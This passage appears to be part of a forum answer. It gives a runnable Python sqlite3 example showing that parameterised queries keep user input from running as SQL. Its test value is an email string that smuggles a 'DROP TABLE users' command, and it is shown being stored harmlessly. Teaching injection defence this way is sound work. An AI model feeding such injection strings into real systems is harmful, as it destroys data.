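As an application-level counterpart to the pseudo-code in the answer above, here is a runnable sketch using Python's standard sqlite3 module, where the ? placeholders play the role of bound parameters; the table layout is an assumption for illustration:
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (email TEXT, hashed_pw TEXT)")

email = "alice@example.com'; DROP TABLE users; --"   # hostile-looking input
hashed_pw = "bcrypt-hash-placeholder"

# The statement text and the values travel separately; the quote and comment
# characters in `email` are stored as plain data, never executed as SQL.
conn.execute("INSERT INTO users VALUES (?, ?)", (email, hashed_pw))

print(conn.execute("SELECT email FROM users").fetchall())
conn.close()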